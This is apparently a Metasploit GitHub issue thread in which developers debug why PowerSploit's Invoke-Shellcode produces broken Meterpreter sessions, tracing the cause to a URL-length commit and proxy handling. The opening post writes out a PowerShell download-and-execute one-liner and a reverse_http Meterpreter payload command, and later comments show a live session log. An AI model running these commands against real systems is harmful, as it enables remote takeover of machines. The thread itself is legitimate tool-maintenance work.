### ISSUE TITLE
Msf with PowerSploit problem

### ISSUE THREAD

**Issue by darkr4y** [rapid7/metasploit-framework#5462]
PowerSploit gives a way to run shellcode 
You can type this in Powershell 
PS>
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1")
PS>
Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost IP -Lport 4444 -Force
It will get a meterpreter session , but when I ues this , it has some problem .

![powersploit](https://cloud.githubusercontent.com/assets/4407382/7953230/d30a6f50-09f4-11e5-9d69-1bd6f7efa67a.png)

**Comment by hmoore-r7** [comment]
The staged payload is not executing properly, which points to as problem with PowerSploit. If you want to avoid closing of dead shells, set AutoVerifySession to false. If the session is actually dead, no commands will work. If it isn't dead, you may be using an outdated copy of Metasploit.

**Comment by darkr4y** [comment]
I will check the PowerSploit's shellcode of meterpter ... thx for help

**Comment by bcook-r7** [comment]
Hi, did updating your copy of metasploit resolve the issue?

**Comment by darkr4y** [comment]
I have updated my metasploit. but it still doesn't work out. I think its the powersploit's problem. I will send a issue to the powersploit project. thx for help~

**Comment by zeknox** [comment]
+1 having the same exact issue.

Ended up running the git bisect process and this is the results I can up with:

<pre>
user@hostname:~/metasploit-framework# git bisect good
9d20d057dd6845ced9abf00ae60983c47a10577d is the first bad commit
commit 9d20d057dd6845ced9abf00ae60983c47a10577d
Author: OJ <oj@buffered.io>
Date:   Fri Mar 20 13:16:43 2015 +1000
 
    Update Meterpreter URL length to 512
 
:040000 040000 5414b0807ca574be258fedb2d52ba728b4dc5bbb 757c1e194468ed35eadd476ef26cafd1e788556f M      lib
</pre>

Everything works perfectly if I'm running an msf version that is earlier than this commit from my testing. The target does have a proxy in place, windows 7 os, and LHOST is set proper on my multi/handler.

The connection will come back perfectly with an older version of msf. If I run the same exact command to the same exact LHOST box with the latest msf version, the sessions will come in borked, and cannot load stdapi.

**Comment by hmoore-r7** [comment]
Sounds like PowerSploit isn't handling the new URL formats then.

**Comment by zeknox** [comment]
For anyone else encountering this issue, this seems to be the most up to date commit that you can use to get PowerSploit Invoke-Shellcode to connect back properly to an msf multi/handler.

cdbe9234192afb2809fb9f5052275505cb981fb7

<pre>git checkout cdbe9234192afb2809fb9f5052275505cb981fb7</pre>

**Comment by hmoore-r7** [comment]
FYI https://github.com/mattifestation/PowerSploit/issues/66 was not a complete fix for this issue. This is still a PowerSploit bug.

**Comment by OJ** [comment]
I just cloned PowerSploit, and did exactly what was shown above:
```
msf exploit(handler) > [*] Starting the payload handler...
[*] 10.1.10.35:50973 (UUID: ac7c7945bc702747/x86=1/windows=1/2015-06-25T22:21:34Z) Staging Native payload ...
[*] Meterpreter session 1 opened (10.1.10.40:9000 -> 10.1.10.35:50973) at 2015-06-26 08:21:35 +1000

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  WIN-S45GUQ5KGVK\OJ @ WIN-S45GUQ5KGVK  10.1.10.40:9000 -> 10.1.10.35:50973 (10.1.10.35)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.35 - Meterpreter session 1 closed.  Reason: User exit
```
So clearly something is out of Sync for you guys. My MSF is `HEAD` on `master` (as always), so this could be some issue with Kali.

From what I can tell, this works fine with the latest version of MSF and PowerSploit.

**Comment by zeknox** [comment]
Was not running a Kali instance, was running at HEAD on master with an instance that was cloned via git.

Not sure if proxy has anything to do with it, but thought I would mention that as well.

**Comment by OJ** [comment]
Proxy would definitely have an impact. Bear in mind that the `reverse_https` stager uses `wininet` and Meterpreter no longer uses that, it uses `winhttp` insead.

Do you have any proxy configuration details available? Handling proxies in `winhttp` has been painful, and there might still be some edge cases which don't work because we don't have all the configuration permutations available.

**Comment by enigma0x3** [comment]
I just did a fresh msf clone with a fresh PowerSploit clone on a Kali box. Did exactly what was shown above as well:

![img1](https://cloud.githubusercontent.com/assets/6264733/8408757/b26373cc-1e40-11e5-973f-c53ab6318c5d.png)

**Comment by zeknox** [comment]
This is most certainly a proxy issue IMO.

**Comment by OJ** [comment]
I think so too. My guess is NTLM proxy. Just like https://github.com/rapid7/metasploit-framework/issues/5626

**Comment by OJ** [comment]
As per #5626 I can't repro an issue after setting up the proxy to use NTLM. So if you're running the latest binaries, there has to be something else going on.

**Comment by OJ** [comment]
Hey all, I've added some documentation to the wiki that talks about all this stuff in a bit of detail. I'd appreciate a review. Thanks!

https://github.com/rapid7/metasploit-framework/wiki/The-ins-and-outs-of-HTTP-and-HTTPS-communications-in-Meterpreter-and-Metasploit-Stagers

**Comment by bcook-r7** [comment]
The proxy issue is solved as of #5691, thanks.
